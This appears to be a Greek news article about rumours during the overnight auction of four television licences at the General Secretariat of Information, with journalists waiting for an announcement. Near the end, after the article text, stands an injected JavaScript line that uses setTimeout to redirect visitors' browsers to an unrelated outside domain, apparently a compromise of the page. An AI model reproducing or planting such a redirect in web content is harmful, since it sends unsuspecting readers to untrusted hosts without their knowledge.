Μεσάνυχτα έληξε η διαδικασία; – Στις ενστάσεις θα κριθεί το αποτέλεσμα

0
7

 

Όργιο φημών πως η δημοπρασία ολοκληρώθηκε τα μεσάνυχτα της Πέμπτης πυροδότησε ένα αυτοκίνητο που στάθμευσε έξω από το κτίριο της Γενικής Γραμματείας Ενημέρωσης.

Λίγο μετά τις 23:00 το βράδυ ένα αυτοκίνητο πάρκαρε μπροστά από την είσοδο του κτιρίου της Γραμαμτείας. Αμέσως σήμανε συναγερμός ανάμεσα στους δημοσιογράφους που έχουν «κατασκηνώσει» έξω από το κτίριο.

Ένας άνδρας μέσα από το κτίριο βγήκε κρατώντας έναν φάκελο, πλησίασε το αυτοκίνητο, παρέδωσε έναν φάκελο και το αυτοκίνητο εν συνεχεία έφυγε από το σημείο.

Κανείς δεν αποκλείει ο φάκελος αυτός να περιείχε το τελικό αποτέλεσμα και η διαδικασία να είχε ολοκληρωθεί.

Και εκεί που υπήρξαν πληροφορίες ότι καθαρογράφονται τα πρακτικά και είναι θέμα χρόνου να ανακοινωθούν τα αποτελέσματα νέες φήμες ανέφεραν πως υπάρχουν ενστάσεις από συμμετέχοντες που δεν ικανοποιήθηκαν με τα αποτελέσματα. Γεγονός που σημαίνει ότι οι ενστάσεις πρέπει να εκδικαστούν προτού υπάρξει η τελική ανακοίνωση.

Άλλες πληροφορίες ανέφεραν πως τελικά οι ανακοινώσεις μετατίθενται για τις πρώτες πρωινές ώρες και το θρίλερ εξακολουθεί αν βρίσκεται σε πλήρη εξέλιξη.

Στο μεταξύ νωρίτερα σύμφωνα με όσα μετέδωσε ο τηλεοπτικός σταθμός ΣΚΑΪ, δύο από τους επιχειρηματίες- υποψήφιους καναλάρχες αντέδρασαν έντονα στο ενδεχόμενο να παραμείνουν στη Γενική Γραμματεία Ενημέρωσης και για τρίτη βραδιά.

Σύμφωνα με τον ΣΚΑΪ, διαμήνυσαν στον Ταξίαρχο της Αστυνομίας ότι δεν πρόκειται να διανυκτερεύσουν κι άλλο βράδυ στην Γενική Γραμματεία, με τον αξιωματικό της ΕΛΑΣ να τους τονίζει ότι πιθανότατα απόψε λήγει η διαδικασία της δημοπρασίας των τεσσάρων τηλεοπτικών αδειών.

Οι δημοσιογράφοι έξω από το κτίριο της Καλλιθέας είναι σε αναμονή της έλευσης του Γεν. Γραμματέα Ενημέρωσης Λευτέρη Κρέτσου, ο οποίος και θα κάνει στη συνέχεια τις σχετικές ανακοινώσεις.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here